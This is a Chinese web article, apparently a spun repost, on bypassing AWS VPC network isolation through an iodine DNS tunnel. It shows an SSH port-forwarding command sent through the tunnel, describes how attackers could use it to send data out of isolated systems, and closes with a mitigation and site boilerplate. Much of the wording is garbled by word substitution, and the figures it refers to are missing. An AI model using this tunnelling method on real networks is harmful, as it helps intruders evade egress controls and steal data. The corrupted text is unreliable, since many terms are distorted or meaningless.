设备如下所示：

公共子网路由表：

私有子网路由表：

DNS的工作道理

私有主机入站安然组：

私有主机出站安然组：

为了证实我无法连接到外部的互联网，下面给出了私家办事器接收的dejandayoff.com收集超时信息。

连接iodine后，我可以应用以下敕令在端口8080上创建一个ssh地道（经由过程iodine DNS地道）来连接google.com：

ssh -L 8080:google.com:443 10.53.53.2 

如不雅进击者可以控制解析某个域名的域名办事器，那么他们就能记录所有阁下名萌芽请求，并捏造响应的响应。固然域名办事器接收的请求必须相符标准的DNS协定，然则它对这些数据的处理并不必定是标准的。

（10.53.53.0/24是iodine地道的子网，10.53.53.2是我可以经由过程ssh连接的iodine办事器）

经由过程curl连接https://127.0.0.1:8080，我们就能达到谷歌的办事器了！

固然上图中谷歌的响应应用了重定向，然则这里要演示的是，一个没有出站规矩、没有互联网网关的办事器照样可以或许达到外部网站。如许一来，进击者就可以轻松地年腋荷琐隔离的体系中向别传输数据，并且不会碰到安然检查。

缓解办法

荣幸的是，亚马逊许可用户禁用VPC中的AmazonProvidedDNS。一旦禁用，用户就必须借助其他软件在收集中创建本身的DNS办事器。如许一来，自定义的DNS办事器就会记录相干的数据，并且还能让它只跟白名单中的网站进行通信。

【编辑推荐】

1. 京东大年夜范围数据中间统??维监控之眼
2. 若何扶植可以或许支撑收集转型的NFVI
3. 漫话SDN：我们须要简单、轻松和自由的收集连接
4. 数据中间收集的三种交换技巧座谈
5. 数据中间收集虚拟化技巧演进过程

【义务编辑：武晓燕 TEL：（010）68476606】

　　推荐阅读

　　如何比较不同浏览器的页面加载时间

如今测试指标和网站样本都选好了，可以开端运行测试了。 CTO练习营 | 12月3-5日，深圳，是时刻成为优良的技巧治理者了 比较浏览器机能的通用办法比来我在Macbook Pro(13版Macbook Pro 2017,>>>详细阅读

本文标题：巧妙利用DNS突破AWS云环境中隔离的网络

地址：http://www.17bianji.com/lsqh/39470.html

 1/2    1